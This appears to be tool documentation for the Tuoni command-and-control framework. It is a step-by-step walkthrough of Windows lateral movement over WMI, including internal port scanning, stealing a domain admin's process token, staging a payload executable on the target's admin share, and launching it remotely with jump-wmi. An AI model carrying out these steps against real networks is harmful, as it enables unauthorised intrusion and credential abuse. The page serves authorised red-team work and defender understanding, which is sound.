Skip to content

Lateral Movement via WMI

This walkthrough covers moving from an initial foothold on one Windows host to a second target machine using WMI (jump-wmi). The same pattern applies to jump-service and jump-winrm - only the delivery mechanism changes.

Prerequisites

  • An active agent on the source machine (the initial foothold)
  • A payload generated for the target platform (Windows executable)
  • Credentials or a token with administrative access on the target machine
  • Network connectivity from the source machine to the target on TCP 135 (WMI/RPC)

Step 1 - Enumerate the environment

Before moving, confirm who you are and what is reachable.

Check the current identity: 

1
run --cmdline "whoami /all"

List running processes to identify opportunities for token theft: 

1
ps

Scan for live hosts and open ports on the internal network: 

1
portscan --ips 10.10.10.0/24 --ports 135,445,3389 --hostDiscovery ICMP --timeout 500

Look for machines with TCP 135 open - these are candidates for WMI lateral movement.

Step 2 - Obtain credentials or a suitable token

Option A - Use a token stolen from a privileged process

If a process running as a domain admin is already on the current machine, steal its token:

1
ps

Identify a process owned by CORP\Administrator (e.g. PID 4832):

1
token-steal --pid 4832

With the token applied, jump-wmi will use it automatically - no plaintext credentials needed.

Option B - Use credentials directly

If you have plaintext credentials, pass them as parameters to jump-wmi.

Step 3 - Stage the payload

Generate an executable payload from the Payloads page for the target architecture (Windows x64 EXE). Note the payload ID.

Upload it to the target's ADMIN$ share using the current agent:

1
upload-payload --filepath \\10.10.10.20\C$\Windows\Temp\svc.exe --payloadId abc123

Alternatively, use copyMethod: SMB in the jump-wmi command to have Tuoni handle staging automatically.

Step 4 - Execute via WMI

With token (no plaintext credentials):

1
2
3
4
5
jump-wmi --target 10.10.10.20
  --payloadId abc123
  --copyMethod SMB
  --copyPath C:\Windows\Temp\svc.exe
  --cmdline C:\Windows\Temp\svc.exe

With plaintext credentials:

1
2
3
4
5
6
jump-wmi --target 10.10.10.20
  --username "CORP\Administrator" --password "P@ssword1"
  --payloadId abc123
  --copyMethod SMB
  --copyPath C:\Windows\Temp\svc.exe
  --cmdline C:\Windows\Temp\svc.exe

Step 5 - Receive the new agent

Switch to the Agents page in the GUI. Within the agent's next callback interval, a new agent entry will appear connected from 10.10.10.20.

Tip

If the agent does not appear, check:

  • Firewall rules on TCP 135 between source and target
  • That the payload was copied successfully (verify via ls on the target path)
  • That WMI service (winmgmt) is running on the target

Step 6 - Clean up

From the new agent on 10.10.10.20, remove the staged binary:

1
rm --filepath C:\Windows\Temp\svc.exe

Revert the token on the source agent:

1
token-use --nr 0

Variations

Method Command Requirements
WMI jump-wmi TCP 135, admin credentials
Windows Service jump-service TCP 445, admin credentials, service creation rights
WinRM jump-winrm TCP 5985/5986, WinRM enabled, Remote Management Users
SSH jump-ssh TCP 22, SSH service running